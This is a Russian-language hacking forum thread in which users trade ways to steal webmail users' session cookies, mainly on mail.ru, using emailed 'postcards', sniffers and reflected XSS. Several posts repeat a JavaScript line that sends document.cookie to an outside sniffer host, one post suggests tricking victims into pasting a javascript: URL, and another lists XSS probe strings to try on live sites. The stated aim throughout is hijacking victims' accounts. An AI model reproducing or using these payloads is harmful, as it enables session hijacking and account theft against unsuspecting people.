Всем привет! :bq:
Ещё есть какие то фишки с хаком типа:
ты отсылаешь на мыло картинку(или что то другое), жертва открывает её и к тебе на сниффер приходят куки.
Если есть, то напишите как)))или дайте линк)))
заранее спасибо!:smartass:

Мне каждый день приходят всякие типо акции,розыгрыши,опросы за которые типо платят,фейки,предупреждени я тип отправте смс..,рассылка тип чтобы от неё отписаться пройдите по ссылочке... Из всех этих кидал можно придумать одно хорошое!)))

Пассивка >alert() и пошёл по страницам искать, подставляя это в адресную строку...

нам тут гадать? для понта выложи код открытки тд и тп.

Цитата:

Сообщение от without_soul

hhhhh

Добавлено через 3 минуты
Подскажите плз :отправляю через снифер открытку яваскрипт,на мыло ,а в лог ничего не приходит после просмотра....да и при открытии не показывает картинку ,на которую вставил ссылку.....только пытаюсь учиться...!

для того чтоб приходило нужно найти пасивную xss на мыле как ето сделать?читай немного выше!
у тебя не прихдит так как пасивка уже не работает!

А как искать пассивку?
Просто подставлять в конец адресной строки alert() ?

у меня есть одна пассивка на маил ру, но работает только когда не вошел под аккаунтом ...
как только входишь, то уже не работает..:wink:

подскажите как решить или пассивка уже не работает ?

да о каком сниффере может идти речь на маил.ру??? Фотка-сниффер там уже не пашет!!!

обоснуй почему по твоему открытка не пашет?

img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;
пишет "неверный формат изображения". невозможно открыть изображение прям там же.куки не приходят. а насчет скрипта для адресной строки javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;') этот код вобще невозможно вставить как ссылку и подсунуть юзеру. или у кого получается? поделитесь,жаль чтоли?

Добавлено через 1 минуту
да не пашет на маил.ру это img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;
пишет "неверный формат изображения". невозможно открыть изображение прям там же.куки не приходят. а насчет скрипта для адресной строки javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;') этот код вобще невозможно вставить как ссылку и подсунуть юзеру.

Вотвот, согласен с terris куки неприходят, а заставить жертву скопировать и вставить код в адресную строку, причём в тойже вкладке что и письмо думаю нереально.

Добавлено через 1 минуту
(JavaScript код для адресной строки c редиректом действительно работает и куки приходят)

vik3001,ты видимо не понял меня. если заставить жертву вставить на адресную строку тот
code:

javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;')

то придут куки.Но...вот в чем моя проблема не могу создать ссылку в которую можно было бы вставить тот самый
code:

javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;')

и еще ведь на mail.ru уже с открыткой в которой код
code:


img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;


не получается стырить куки!!!

чтобы стырить надо жертву заставить явакод для адресной строки себе вставить( А это не так просто! Вот еслибы его можно было под ссылку замаскировать то было-бы гуд)

Цитата:

Сообщение от ROCK_sTaR

Пассивка >alert() и пошёл по страницам искать, подставляя это в адресную строку...

всмысле так искать пасивку а вот как узнать что ты её нашеел и где можон искать и как её добавлять после ссылки типа
http://hacker-pro.net/newreply.php?do=newreply&p=105559>alert()

пробуйте подставлять в адресную строку вот эти скрипты для проверки уязвимости:
alert()
">alert()
'>">alert(/XSS/)
alert('xss')
alert('A');
">alert(document .cookie)

Люди пользуйтесь XSS ето лутше всего чем посылать жертве огромный скрипт

XSS как ее найти. Я новичек еще. И alert() давно уже неработает

http://files.webmoney.ru/files/1zSXfSQb/link?direct=yes